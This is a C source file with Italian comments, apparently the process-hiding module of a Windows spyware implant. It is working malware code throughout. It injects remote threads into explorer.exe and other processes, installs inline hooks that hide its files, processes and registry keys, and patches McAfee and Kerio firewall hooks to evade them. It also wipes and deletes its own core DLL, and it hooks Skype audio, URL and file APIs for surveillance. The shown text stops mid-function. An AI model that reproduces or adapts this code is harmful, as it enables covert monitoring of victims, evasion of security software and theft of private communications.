////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//
// HIDING MODULE SECTION {HM}:
//
// 
// 
// HMServiceStruct:
//	HM_IpcCliWrite_t pHM_IpcCliWrite	- PTR. IPC di scrittura
//	HM_IpcCliRead_t  pHM_IpcCliRead;	- PTR. IPC di lettura
//	HM_sCreateHook_t pHM_sCreateHook;	- PTR. funzione che alloca codice/dati di un Hook
//	DWORD PARAM[10];
//
// EXPORTS: 
//  static DWORD HM_sCreateHookA(HANDLE,char*,char*,BYTE*,DWORD,BYTE*,DWORD)
//  HANDLE HM_sStartHookingThread(HANDLE hProcess)
//	void HM_sMain()			- Entry point della DLL
// 
//  void HM_s<GenericHook>(HANDLE, HMServiceStruct *)
//  void HM_s<GenericService>(HMServiceStruct *)
//  [vedere HM_sInBundleHook e HM_sInBundleService come prototipi] 
//
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

#include "common.h" 
#include "H4-DLL.h"	
#include "HM_CodeAlign.h"
#include "AM_Core.h"
#include "HM_InbundleHook.h"
#include "LOG.h" // XXX da includere nei singoli moduli di agent
#include "HM_IpcModule.h"
#include "SM_Core.h"
#include "PEB.h"
#include "HM_VistaSpecific.h"
#include <Psapi.h>
#include "aes_alg.h"
#include "bin_string.h"
#include "UnHookClass.h"
#include "av_detect.h"
#include <time.h>

#pragma bss_seg("shared")
BYTE crypt_key[KEY_LEN];     // Chiave di cifratura
aes_context crypt_ctx;  // Context per la cifratura
DWORD log_free_space;   // Spazio a disposizione per i log
DWORD log_active_queue;  // Quale coda e' attiva 1 o 0
DWORD process_bypassed; //Numero di processi da bypassare
char process_bypass_list[MAX_DYNAMIC_BYPASS+EMBEDDED_BYPASS][MAX_PATH]; // Lista dei processi su cui non fare injection
// Nomi dei file di sistema.
// Sono qui perche' ad esempio anche le funzioni di 
// setup dei wrapper devono poterci accedere dall'interno
// dei processi iniettati.
char H4DLLNAME[MAX_RAND_NAME];
char H4_CONF_FILE[MAX_RAND_NAME];
char H4_CONF_BU[MAX_RAND_NAME];
char H4_HOME_DIR[MAX_RAND_NAME];
char H4_HOME_PATH[DLLNAMELEN];
char H4_CODEC_NAME[MAX_RAND_NAME];
char H4_DUMMY_NAME[MAX_RAND_NAME];
char H4_UPDATE_FILE[MAX_RAND_NAME];
char REGISTRY_KEY_NAME[MAX_RAND_NAME];
#pragma bss_seg()
#pragma comment(linker, "/section:shared,RWS")

// Prototipi usati per comodita'
char *HM_FindProc(DWORD);
DWORD HM_FindPid(char *, BOOL);
void HM_U2A(char *buffer);

#include "HM_ProcessMonitors.h" // XXX da modificare
#include "HM_KeyLog.h" // XXX da modificare
#include "HM_SnapShot.h" // XXX da modificare
#include "HM_PrintPool.h" // XXX da modificare 
#include "HM_CrisisAgent.h" // XXX da modificare 
#include "HM_SkypeRecord.h" // XXX da modificare 
#include "HM_UrlLog.h" // XXX da modificare 
#include "HM_ClipBoard.h" // XXX da modificare 
#include "HM_WebCam.h" // XXX da modificare 
#include "HM_AmbMic.h" // XXX da modificare 
#include "HM_MailCap.h" // XXX da modificare 
#include "HM_Pstorage.h" // XXX da modificare 


// Qui finira' il binary patch con la chiave di cifratura
BYTE bin_patched_key[KEY_LEN] = "ngkdNGKDh4H4883";

// Variabili di configurazione globali
nanosec_time date_delta; // Usato per eventuali aggiustamenti sulla lettura delle date

typedef struct  {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;
    DWORD   AddressOfNames;
    DWORD   AddressOfNameOrdinals;
} MY_IMAGE_EXPORT_DESCRIPTOR;

// Per non usare la GetProcAddress che potrebbe avere una entry
// modificata nella import table
void *HM_SafeGetProcAddress(HMODULE hModule, char *func_to_search)
{
	BYTE *ImageBase = (BYTE *)hModule;
	IMAGE_NT_HEADERS *PE_Header;
	MY_IMAGE_EXPORT_DESCRIPTOR *Dll_Export;
	DWORD Index;
	unsigned short *Ordinal;
	DWORD *pFuncName;
	DWORD *pFunc_Pointer;

	// Verifica che sia un PE
	if (ImageBase[0]!='M' || ImageBase[1]!='Z')
		return NULL;
		
	PE_Header = (IMAGE_NT_HEADERS *)(ImageBase + ImageBase[0x3C]);
	// Qualche controllo sugli headers
	if (PE_Header->Signature != 0x00004550 || PE_Header->OptionalHeader.NumberOfRvaAndSizes < 1 ||
		PE_Header->OptionalHeader.DataDirectory[0].VirtualAddress == 0) 
		return NULL;

	Dll_Export = (MY_IMAGE_EXPORT_DESCRIPTOR *) (ImageBase + PE_Header->OptionalHeader.DataDirectory[0].VirtualAddress);
	// Scorre la lista di DLL importate
	for (Index=0; Index < Dll_Export->NumberOfNames ; Index++) {	
		pFuncName = (DWORD *)(ImageBase + Dll_Export->AddressOfNames + Index*4);
		if (*pFuncName == NULL)
			continue;			
		// Vede se e' la funzione che cerchiamo
		if (!strcmp(func_to_search, (char *)(ImageBase + *pFuncName)))
			break;
	}
	
	if(Index >= Dll_Export->NumberOfNames)
		return NULL;

	// Legge Ordinale
	Ordinal = (unsigned short *) (ImageBase + Dll_Export->AddressOfNameOrdinals + Index*2);
	// Legge il puntatore a funzione
	pFunc_Pointer = (DWORD *) (ImageBase + Dll_Export->AddressOfFunctions + (*Ordinal)*4);
	return (ImageBase + *pFunc_Pointer);
}




////////////////////////////////////////////////////////////////////////////////
// 
// Strutture, Dati e funzione iniettata nel Processo 
// da Hookare [Threddino]
// 

typedef void (__stdcall *Sleep_t)(DWORD);
typedef struct
{
	HMCommonDataStruct pCommon;
	char cDLLHookName[DLLNAMELEN];				// Nome della dll principale ("H4.DLL")
	char cInBundleHookName[DLLNAMELEN];
	char cInBundleServiceName[DLLNAMELEN];
	// Funzioni da usare nell'Thread  inizializzate dalla setup
	ResumeThread_T pResumeThread;
	OpenThread_T pOpenThread;
	CloseHandle_T pCloseHandle;
	Sleep_t pSleep;
	DWORD dwPid;
	DWORD dwThid;
} HMHookingThreadDataStruct;

// Con questa si settano tutte le funzioni di Libreria che stanno 
// in KERNEL32 e NTDLL

DWORD HM_HookingThreadSetup(DWORD * pD)
{	
	HMODULE hMod;

	HMHookingThreadDataStruct *pHMHookingThreadData = (HMHookingThreadDataStruct *) pD;
	VALIDPTR(hMod = GetModuleHandle("KERNEL32.DLL"))

	// API utilizzate dal thread remoto.... [KERNEL32.DLL]
	VALIDPTR(pHMHookingThreadData->pCommon._LoadLibrary = (LoadLibrary_T) HM_SafeGetProcAddress(hMod, "LoadLibraryA"))
	VALIDPTR(pHMHookingThreadData->pCommon._GetProcAddress = (GetProcAddress_T) HM_SafeGetProcAddress(hMod, "GetProcAddress"))
	VALIDPTR(pHMHookingThreadData->pCommon._FreeLibrary = (FreeLibrary_T) HM_SafeGetProcAddress(hMod, "FreeLibrary"))
	VALIDPTR(pHMHookingThreadData->pResumeThread = (ResumeThread_T) HM_SafeGetProcAddress(hMod, "ResumeThread"))
	VALIDPTR(pHMHookingThreadData->pOpenThread = (OpenThread_T) HM_SafeGetProcAddress(hMod, "OpenThread"))
	VALIDPTR(pHMHookingThreadData->pSleep = (Sleep_t) HM_SafeGetProcAddress(hMod, "Sleep"))
	VALIDPTR(pHMHookingThreadData->pCloseHandle = (CloseHandle_T) HM_SafeGetProcAddress(hMod, "CloseHandle"))
	
	// Non lo prendiamo dai nomi guessati perche' la shared potrebbe non essere caricata
	// se stiamo girando in un servizio
	if (!FindModulePath(pHMHookingThreadData->cDLLHookName, sizeof(pHMHookingThreadData->cDLLHookName)))
		return 1;

	sprintf(pHMHookingThreadData->cInBundleHookName, "%s", "HFF3");
	sprintf(pHMHookingThreadData->cInBundleServiceName, "%s", "HFF4");

	return 0;
}
					

// Essendo un Thread attivo pData viene passato da 
// CreataRemoteThread
DWORD HM_HookingThread(HMHookingThreadDataStruct *pDataThread)
{
	// Le funzioni di libreria che non sono in NTDLL e KERNEL32
	// le devo risolvere nel processo figlio.....
	HMServiceStruct sServiceData;
	HM_CreateService_t pCreateService = NULL; 
	HM_CreateHook_t pCreateHook = NULL; 
	HMODULE hH4Mod = NULL;
	
	INIT_WRAPPER(HMHookingThreadDataStruct)

	sServiceData.pHM_IpcCliRead = NULL;
	sServiceData.pHM_IpcCliWrite = NULL;
	// Lancia le funzioni CreateService e InbundleHook
	hH4Mod = pDataThread->pCommon._LoadLibrary((LPCSTR)pDataThread->cDLLHookName);
	if(hH4Mod) {
		if((pCreateService = (HM_CreateService_t) pDataThread->pCommon._GetProcAddress(hH4Mod, pDataThread->cInBundleServiceName)))
			pCreateService(pDataThread->dwPid, &sServiceData);

		// Verifica che i services siano stati installati con successo
		if (sServiceData.pHM_IpcCliRead && sServiceData.pHM_IpcCliWrite)
			if((pCreateHook = (HM_CreateHook_t) pDataThread->pCommon._GetProcAddress(hH4Mod, pDataThread->cInBundleHookName)))
				pCreateHook(pDataThread->dwPid, &sServiceData);						
	}
	
	// Resuma il thread principale (se stiamo infettando un processo appena nato che non 
	// e' in SUSPENDED)
	// E' NULL solo se H4.DLL ha invocato il thread
	if(pDataThread->dwThid != NULL) {
		HANDLE hMainThread = pDataThread->pOpenThread(THREAD_ALL_ACCESS, TRUE, pDataThread->dwThid);
		if(hMainThread != NULL) {
			pDataThread->pResumeThread(hMainThread);
			pDataThread->pCloseHandle(hMainThread);
		}
	}

	// Scarica H4DLL dal processo....
	if (hH4Mod)
		pDataThread->pCommon._FreeLibrary(hH4Mod);

	// XXX Per gestione messaggi?????
	for(;;)
		pDataThread->pSleep(1000);

	return 1;
}

////////////////////////////////////////////////////////////////////////////////
// 
//	 Funzioni per iniettare dentro explorer il codice 
//   per cancellare la DLL core e la directory di lavoro

typedef BOOL (WINAPI *RemoveDirectory_t) (LPCTSTR);
typedef BOOL (WINAPI *DeleteFile_t) (LPCTSTR);
typedef BOOL (WINAPI *VirtualFree_t) (LPVOID, SIZE_T, DWORD);
typedef HANDLE (WINAPI *CreateFile_t) (LPCTSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef BOOL (WINAPI *WriteFile_t)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL (WINAPI *CloseHandle_t) (HANDLE);

typedef struct {
	COMMONDATA;
	RemoveDirectory_t pRemoveDirectory;
	DeleteFile_t pDeleteFile;
	VirtualFree_t pVirtualFree;
	CreateFile_t pCreateFile;
	WriteFile_t pWriteFile;
	CloseHandle_t pCloseHandle;
	Sleep_t pSleep;
	BOOL wipe_file;
	char core_file[DLLNAMELEN];
	char work_dir[DLLNAMELEN];
} HMRemoveCoreThreadDataStruct;

// Thread iniettato dentro explorer per cancellare il core
// e la directory di lavoro
#define CORE_FILE_LEN 150000 // 150KB
DWORD HM_RemoveCoreThread(void *dummy)
{
	HANDLE hf;
	DWORD data_wiped;
	DWORD dwTmp;
	DWORD wipe_string = 0;
	INIT_WRAPPER(HMRemoveCoreThreadDataStruct);

	// Tenta il wiping
	if (pData->wipe_file) {
		// Cerca a tutti i costi di aprire il file in scrittura
		// Il file deve esistere.
		// Non ha share mode, perche' nessuno deve poter caricare la DLL mentre
		// ci sta scrivendo sopra.
		while ( (hf = pData->pCreateFile(pData->core_file, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL) ) == INVALID_HANDLE_VALUE )
			pData->pSleep(100);
		
		for (data_wiped=0; data_wiped<CORE_FILE_LEN; data_wiped+=sizeof(wipe_string))
			pData->pWriteFile(hf, &wipe_string, sizeof(wipe_string), &dwTmp, NULL);

		pData->pCloseHandle(hf);
	}

	// Qui la DLL non e' consistente (le eventuali aperture
	// dovrebbero fallire)

	// Cerca a tutti i costi di cancellare il core
	while(!pData->pDeleteFile(pData->core_file))
		pData->pSleep(100);

	// Cancella la working dir
	pData->pRemoveDirectory(pData->work_dir);

	// Libera la memoria della data struct
	// (non puo' liberare il codice che sta eseguendo)
	pData->pVirtualFree((BYTE *)pData->dwDataAdd, 0, MEM_RELEASE);

	return 1;
}


// Inietta il thread in explorer per la cancellazione
// del core. Se explorer non e' attivo, prova a iniettare
// finche non ci riesce.
#define REMOVE_SLEEP_TIME 200
void HM_RemoveCore()
{
	HMRemoveCoreThreadDataStruct HMRemoveCoreThreadData;
	DWORD explorer_pid;
	HMODULE hMod;
	HANDLE hProcess;
	HANDLE hThreadRem;
	DWORD dwThreadId;
	BYTE *pCodeRemote;
	BYTE *pDataRemote;

	// Dice al thread se fare il wiping
	HMRemoveCoreThreadData.wipe_file = log_wipe_file;

	// Setup del thread di cancellazione
	if (! (hMod = GetModuleHandle("KERNEL32.DLL")) )
		return;
	HM_CompletePath(H4DLLNAME, HMRemoveCoreThreadData.core_file);
	HM_CompletePath("", HMRemoveCoreThreadData.work_dir);
	HMRemoveCoreThreadData.pDeleteFile = (DeleteFile_t) HM_SafeGetProcAddress(hMod, "DeleteFileA");
	HMRemoveCoreThreadData.pCreateFile = (CreateFile_t) HM_SafeGetProcAddress(hMod, "CreateFileA");
	HMRemoveCoreThreadData.pWriteFile = (WriteFile_t) HM_SafeGetProcAddress(hMod, "WriteFile");
	HMRemoveCoreThreadData.pCloseHandle = (CloseHandle_t) HM_SafeGetProcAddress(hMod, "CloseHandle");
	HMRemoveCoreThreadData.pRemoveDirectory = (RemoveDirectory_t) HM_SafeGetProcAddress(hMod, "RemoveDirectoryA");
	HMRemoveCoreThreadData.pVirtualFree = (VirtualFree_t) HM_SafeGetProcAddress(hMod, "VirtualFree"); 
	HMRemoveCoreThreadData.pSleep = (Sleep_t) HM_SafeGetProcAddress(hMod, "Sleep");  
	if (!HMRemoveCoreThreadData.pDeleteFile || 
		!HMRemoveCoreThreadData.pCreateFile ||
		!HMRemoveCoreThreadData.pWriteFile ||
		!HMRemoveCoreThreadData.pCloseHandle ||
		!HMRemoveCoreThreadData.pRemoveDirectory ||
		!HMRemoveCoreThreadData.pVirtualFree ||
		!HMRemoveCoreThreadData.pSleep)
		return;

	// Cicla finche' non trova explorer.exe
	while( !(explorer_pid = HM_FindPid("explorer.exe", TRUE)) )
		Sleep(REMOVE_SLEEP_TIME);

	// Inietta il thread di cancellazione
	if(HM_sCreateHookA(explorer_pid, NULL, NULL, 
					   (BYTE *)HM_RemoveCoreThread, 
					   900, (BYTE *)&HMRemoveCoreThreadData, 
					   sizeof(HMRemoveCoreThreadData)) == NULL)
							return;

	pCodeRemote = (BYTE *)HMRemoveCoreThreadData.dwHookAdd;
	pDataRemote = (BYTE *)HMRemoveCoreThreadData.dwDataAdd;

	// Esegue il thread in explorer.exe
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid);
	if(hProcess == NULL) 
		return;

	hThreadRem = HM_SafeCreateRemoteThread(hProcess, NULL, 8192, 
									(LPTHREAD_START_ROUTINE)pCodeRemote, 
									(LPVOID)pDataRemote, 0, 
									&dwThreadId);

	// Se fallisce libera la memoria in explorer.exe
	if(hThreadRem == NULL) {
		VirtualFreeEx(hProcess, pCodeRemote, 0, MEM_RELEASE);
		VirtualFreeEx(hProcess, pDataRemote, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return;
	}

	// Sara' il thread in explorer a liberare la memoria 
	// della funzione iniettata...
	CloseHandle(hThreadRem);
	CloseHandle(hProcess);
	
	return;
}


////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// 
//								EXPORTS SECTION: START 
//
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////



// Verifica se il processo e' nella lista dei processi da non toccare
// Torna TRUE se il processo e' nella lista
BOOL HM_ProcessByPass(DWORD pid)
{
	char *process_name;
	DWORD i;

	// Prende il nome del processo "pid"
	if ( !(process_name = HM_FindProc(pid)) )
		return FALSE;
	
	// Lo compara con quelli da bypassare
	for(i=0; i<process_bypassed; i++) {
		if (!stricmp(process_name, process_bypass_list[i])) {
			SAFE_FREE(process_name);
			return TRUE;
		}
	}

	SAFE_FREE(process_name);
	return FALSE;
}


////////////////////////////////////////////////////////////////////////////////
// 
// Inietta il Thread nel processo da sui effetuare API Hooking
//
HANDLE __stdcall HM_sStartHookingThread(DWORD dwPid, DWORD dwThid)
{
	HANDLE hThreadRem = INVALID_HANDLE_VALUE;
	HANDLE hProcess;
	DWORD dwThreadId;
	HMHookingThreadDataStruct HMHookingThreadData;
	HideDevice dev_pid;

	// Se e' un processo da non toccare non esegue nulla
	if (HM_ProcessByPass(dwPid))
		return INVALID_HANDLE_VALUE;

	// Il threddino deve avere i pid del processo....
	HMHookingThreadData.dwPid = dwPid;
	HMHookingThreadData.dwThid = dwThid;
	
	// Setup del threddino: riloca le funzioni da usare ecc...
	// se ritorna TRUE c'e' stato un errore nella risoluzion
	// degli address delle api
	if(HM_HookingThreadSetup((DWORD *)&HMHookingThreadData))
		return INVALID_HANDLE_VALUE;
	
	dev_pid.unhook_hidepid(GetCurrentProcessId(), TRUE);

	// Alloca dati e funzioni nell processo hProcess
	if(HM_sCreateHookA(dwPid, 
					   NULL, NULL, 
					   (BYTE *)HM_HookingThread, 
					   500, 
					   (BYTE *)&HMHookingThreadData, 
					   sizeof(HMHookingThreadData)) == NULL)
							return INVALID_HANDLE_VALUE;
	
	// Esegue il thread di hooking
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
	if(hProcess != NULL) {
		hThreadRem = HM_SafeCreateRemoteThread(hProcess, 
	 									NULL, 
										8192, 
										(LPTHREAD_START_ROUTINE)HMHookingThreadData.pCommon.dwHookAdd, 
										(LPVOID)HMHookingThreadData.pCommon.dwDataAdd, 
										0, 
										&dwThreadId);

		// Se fallisce perche' siamo su Vista e vogliamo infettare SVCHOST
		// prova con la NtCreateThreadEx()
		if (hThreadRem == NULL)
			hThreadRem = VistaCreateRemoteThread(hProcess, 
	 									(LPTHREAD_START_ROUTINE)HMHookingThreadData.pCommon.dwHookAdd, 
										(LPVOID)HMHookingThreadData.pCommon.dwDataAdd);
		CloseHandle(hProcess);
	}
	dev_pid.unhook_hidepid(GetCurrentProcessId(), FALSE);
	// Errore
	if(hThreadRem == NULL)
		return INVALID_HANDLE_VALUE;
		

	// XXX Qui dovrebbe fare una wait for single object (da vedere con chiodo)

	// XXX L'handle tornato serve solo per vedere se
	// la funzione e' andata a buon fine. Lo chiudiamo
	// tanto nessun chiamante di questa funzione utilizza
	// mai l'handle tornato. Se no rimangono aperti 
	// un sacco di handle.
	if (hThreadRem != INVALID_HANDLE_VALUE)
		CloseHandle(hThreadRem);
	return hThreadRem;
}

////////////////////////////////////////////////////////////////////////////////
// 
// Copia codice e dati dell'Hook nel process dwPid 
// Questa funzione viene usata anche per iniettare un Thread
// nel processo figlio 
//
#define CRETURN(x)	if(x) {CloseHandle(x);return NULL;}

DWORD __stdcall  HM_sCreateHookA(DWORD dwPid, 
								 char *APIName, 
								 char *DLLAPIName, 
								 BYTE *HookAdd, 
								 DWORD HookSize, 
								 BYTE *HookData, 
								 DWORD HookDataSize)
{
	DWORD code_len = 0, call_offs;
	BYTE *op_code;
	DWORD *op_operand;
	HMODULE h_module = NULL;
	BYTE APIOnLocal[64];
	BYTE JMP_Code[REDIR_SIZE];
	DWORD dummy;
	HANDLE hProcess;
	HMCommonDataStruct *pCommonData = (HMCommonDataStruct *)HookData;

	// reset 
	pCommonData->dwHookAdd  = NULL;
	pCommonData->dwDataAdd  = NULL;

	// 
	if((hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, dwPid)) == NULL)
		return NULL;

	// Dobbiamo creare un HOOK ?????
	IFDEF(DLLAPIName) {
		if ( !(h_module = LoadLibrary(DLLAPIName)) )
			CRETURN(hProcess);
	} else
			pCommonData->bAPIAdd    = NULL;
	
	// Dobbiamo creare un HOOK ?????
	IFDEF(APIName)
		if ( !(pCommonData->bAPIAdd = (BYTE *)HM_SafeGetProcAddress(h_module, APIName)) ) 
			CRETURN(hProcess);
	
	// Controlla se ce' codice da Hookare
	IFDEF(pCommonData->bAPIAdd) {
		// Legge i primi 64 byte della funzione da wrappare per farci dei controlli
		if (! ReadProcessMemory(hProcess, pCommonData->bAPIAdd, APIOnLocal, sizeof(APIOnLocal), &dummy) )
			CRETURN(hProcess);
	
		// Controlla che la func non sia gia wrappata
		if(APIOnLocal[0] == 0xB8 && APIOnLocal[5] == 0xFF && APIOnLocal[6] == 0xE0)
			CRETURN(hProcess);

		// Allinea il limite dell'istruzione
		while (code_len < (DWORD)REDIR_SIZE) 
			code_len += HM_sCodeAlign(APIOnLocal + code_len);
				
		if (code_len > 15)
			CRETURN(hProcess);
	}

	// Alloca memoria per il codice dell'Hook
	pCommonData->dwHookAdd = (DWORD)VirtualAllocEx(hProcess, 0, HookSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if(!pCommonData->dwHookAdd)
		CRETURN(hProcess);

	// Alloca memoria per i dati dell'Hook
	pCommonData->dwDataAdd = (DWORD)VirtualAllocEx(hProcess, 0, HookDataSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if(!pCommonData->dwDataAdd)
		CRETURN(hProcess);

	IFDEF(pCommonData->bAPIAdd) {
		// Crea lo stub...
		memset(HookData, 0x90, STUB_SIZE);	       // Riempie di NOP
		memcpy(HookData, APIOnLocal, code_len); // Copia n istruzioni dall'API originale che verranno sovrascritte
		
		// ...setta il JMP al codice originale...
		HookData[15] = 0xE9;	// OpCode JMP
		*((DWORD *)(HookData + 16)) = (DWORD)pCommonData->bAPIAdd + code_len - ((DWORD)pCommonData->dwDataAdd + STUB_SIZE - 4); //Offset relativo per saltare dentro l'API originale dal wrapper
		
		// ... e riloca eventuali CALL nelle istruzioni copiate nello stub.
		for (code_len=0; code_len<REDIR_SIZE; code_len += HM_sCodeAlign(HookData + code_len)) {
			op_code = HookData + code_len;
			op_operand = (DWORD *)(HookData + code_len + 1);
			if (*op_code == 0xE8 || *op_code == 0xE9) {
				*op_operand -= (pCommonData->dwDataAdd - (DWORD)pCommonData->bAPIAdd);

				// Vede se c'e' un altro wrapper
				if (*op_code == 0xE9) {
					BYTE *jmp_dest;
					DWORD *ptr_ret_jmp;
					DWORD ret_jmp;
					DWORD return_addr;
					DWORD i;
					// Calcola la destinazione del salto
					jmp_dest = (BYTE *)(pCommonData->dwDataAdd + code_len + 5 + *op_operand);

					// Cerca di patchare il wrapper di McAfee
					if (code_len==0 && jmp_dest[0]==0x68 && jmp_dest[5]==0xE8) {
						// XXX Cambia la JMP del wrapper con il preambolo della 
						// funzione CreateProcess su XP. 
						// E' un'operazione molto pericolosa anche perche' su 2000
						// il preambolo e' diverso
						memcpy(HookData, "\x8B\xFF\x55\x8B\xEC", 5);
					} else { // Cerca di patchare il wrapper di KerioPFW
						// Cerca la jmp di ritorno
						for (i=0; i<0x30; i++, jmp_dest++) {
							// Modifica la destinazione per tornare nello stub
							if (*jmp_dest == 0xE9) {
								// Calcola l'indirizzo di ritorno nell'API
								ptr_ret_jmp = (DWORD *)(jmp_dest + 1);
								ret_jmp = (DWORD)(jmp_dest + (*ptr_ret_jmp) + 5);
								// Caso XP (Salta dopo la JMP)
								if (ret_jmp == (((DWORD)pCommonData->bAPIAdd) + 5) ) {
									return_addr = pCommonData->dwDataAdd + code_len - (DWORD)jmp_dest;
									if ( !WriteProcessMemory(hProcess, jmp_dest+1, &return_addr, 4, &dummy) )
										CRETURN(hProcess);
									break;
								} else if (ret_jmp == (((DWORD)pCommonData->bAPIAdd) + 6) ) {
									// Caso 2000 (Dobbiamo ricostruire un'istruzione)
									// Le istruzioni sono disallineate. Quindi copiamo
									// due byte in piu' e li facciamo eseguire nel nostro
									// Stub. Poi risaltiamo nell'API originale 2 byte dopo
									BYTE *patch_addr;
									return_addr = pCommonData->dwDataAdd + code_len - (DWORD)jmp_dest;
									if ( !WriteProcessMemory(hProcess, jmp_dest+1, &return_addr, 4, &dummy) )
										CRETURN(hProcess);
									patch_addr = HookData + code_len + 5;
									memcpy(patch_addr, "\xFF\x75\x28", 3);
									(*((DWORD *)(HookData + 16))) += 2;
									break;
								} 
							}
						}
					}
				}
			}
		}
	}

	// Copia la funzione wrapper
	if ( !WriteProcessMemory(hProcess, (BYTE *)pCommonData->dwHookAdd, HookAdd, HookSize, &dummy) )
		CRETURN(hProcess);
	
	// Copia la struttura dati
	if ( !WriteProcessMemory(hProcess, (BYTE *)pCommonData->dwDataAdd, HookData, HookDataSize, &dummy) )
		CRETURN(hProcess);

	// Setta nel wrapper il puntatore ai dati
	for(call_offs = 0; *(HookAdd + call_offs)!= 0x69; call_offs++);
	if ( !WriteProcessMemory(hProcess, (BYTE *)(pCommonData->dwHookAdd + call_offs), &pCommonData->dwDataAdd, 4, &dummy) )
		CRETURN(hProcess);

	IFDEF(pCommonData->bAPIAdd) {
		// Crea il jump code nell'API originale
		JMP_Code[0]='\xB8';
		*((DWORD *)(&JMP_Code[1])) = (DWORD)(pCommonData->dwHookAdd);
		JMP_Code[5]='\xFF';
		JMP_Code[6]='\xE0';
		if ( !WriteProcessMemory(hProcess, pCommonData->bAPIAdd, JMP_Code, REDIR_SIZE, &dummy) )
			CRETURN(hProcess);
	}

	CloseHandle(hProcess);
	return pCommonData->dwDataAdd;
}

void __stdcall HM_sInBundleHook(DWORD dwPid, HMServiceStruct * pServiceData)
{
	// XXX Check ridondante nel caso il padre sia svchost che non ha la lista
	// perche' non ha la shared
	if (HM_ProcessByPass(dwPid))
		return;

	// Hook inbundle di Hidding...
	HMMAKE_HOOK(dwPid, "CreateProcessA", NtCreateProcessHook, NTCreateProcessRWData, NtCreateProcessHook_setup, pServiceData, "KERNEL32.dll");
	HMMAKE_HOOK(dwPid, "CreateProcessW", NtCreateProcessHook, NTCreateProcessRWData, NtCreateProcessHook_setup, pServiceData, "KERNEL32.dll");
	HMMAKE_HOOK(dwPid, "CreateProcessAsUserA", NtCreateProcessAsUserHook, NTCreateProcessRWData, NtCreateProcessHook_setup, pServiceData, "ADVAPI32.dll");
	HMMAKE_HOOK(dwPid, "CreateProcessAsUserW", NtCreateProcessAsUserHook, NTCreateProcessRWData, NtCreateProcessHook_setup, pServiceData, "ADVAPI32.dll");
	HMMAKE_HOOK(dwPid, "NtQueryDirectoryFile", NtQueryDirectoryFileHook, NtQueryDirectoryFileData, NtQueryDirectoryFileHook_setup, pServiceData, "NTDLL.dll");
	HMMAKE_HOOK(dwPid, "NtQuerySystemInformation", NtQuerySystemInformationHook, NTQuerySystemInformationData, NtQuerySystemInformationHook_setup, pServiceData, "NTDLL.dll");
	HMMAKE_HOOK(dwPid, "NtDeviceIoControlFile", NtDeviceIoControlFileHook, NTDeviceIOControlFileData, NtDeviceIoControlFileHook_setup, pServiceData, "NTDLL.dll");
	HMMAKE_HOOK(dwPid, "NtEnumerateValueKey", NtEnumerateValueKeyHook, NtEnumerateValueKeyData, NtEnumerateValueKeyHook_setup, pServiceData, "NTDLL.dll");	
	HMMAKE_HOOK(dwPid, "NtQueryKey", NtQueryKeyHook, NtQueryKeyData, NtQueryKeyHook_setup, pServiceData, "NTDLL.dll");	
	//HMMAKE_HOOK(dwPid, "OpenProcess", OpenProcessHook, OpenProcessData, OpenProcessHook_setup, pServiceData, "KERNEL32.dll");	
	
	// Metto gli Hook per tutti i PM inbundle...
	// --- PM per Url Monitor
	HMMAKE_HOOK(dwPid, "InternetCanonicalizeUrlA", PM_InternetCanonicalizeUrl, InternetCanonicalizeUrlData, PM_InternetCanonicalizeUrl_setup, pServiceData, "Wininet.dll");
	HMMAKE_HOOK(dwPid, "InternetCanonicalizeUrlW", PM_InternetCanonicalizeUrl, InternetCanonicalizeUrlData, PM_InternetCanonicalizeUrl_setup, pServiceData, "Wininet.dll");

	// --- PM per SKYPE
	HMMAKE_HOOK(dwPid, "waveOutWrite", PM_waveOutWrite, waveOutWriteData, PM_waveOutWrite_setup, pServiceData, "WINMM.dll");
	HMMAKE_HOOK(dwPid, "waveInUnprepareHeader", PM_waveInUnprepareHeader, waveInUnprepareHeaderData, PM_waveInUnprepareHeader_setup, pServiceData, "WINMM.dll");
	HMMAKE_HOOK(dwPid, "WriteFile", PM_WriteFile, WriteFileData, PM_WriteFile_setup, pServiceData, "KERNEL32.dll");
	HMMAKE_HOOK(dwPid, NULL, PM_DSGetCP, DSGetCPData, PM_DSGetCP_setup, pServiceData, "dsound.dll");
	HMMAKE_HOOK(dwPid, NULL, PM_DSCapGetCP, DSCapGetCPData, PM_DSCapGetCP_setup, pServiceData, "dsound.dll");

	// --- PM per il file agent... XXX Le versioni Ascii richiamano comunque quelle WideChar
	// Tranne la MoveFileA, che comunque da explorer non viene mai richiamata...
	//HMMAKE_HOOK(dwPid, "CreateFileA", PM_CreateFile, CreateFileData, PM_CreateFile_setup, pServiceData, "KERNEL32.dll");
	HMMAKE_HOOK(dwPid, "CreateFileW", PM_CreateFile, CreateFileData, PM_CreateFile_setup, pServiceData, "KERNEL32.dll");
	//HMMAKE_HOOK(dwPid, "DeleteFileA", PM_DeleteFile, CreateFileData, PM_CreateFile_setup, pServiceData, "KERNEL32.dll");
	HMMAKE_HOOK(dwPid, "DeleteFileW", PM_DeleteFile, CreateFileData, PM_CreateFile_setup, pServiceData, "KERNEL32.dll");
	//HMMAKE_HOOK(dwPid, "MoveFileA", PM_MoveFile, CreateFileData, PM_CreateFile_setup, pServiceData, "KERNEL32.dll");
	HMMAKE_HOOK(dwPid, "MoveFileW", PM_MoveFile, CreateFileData, PM_CreateFile_setup, pServiceData, "KERNEL32.dll");

	// --- PM per il keylog agent
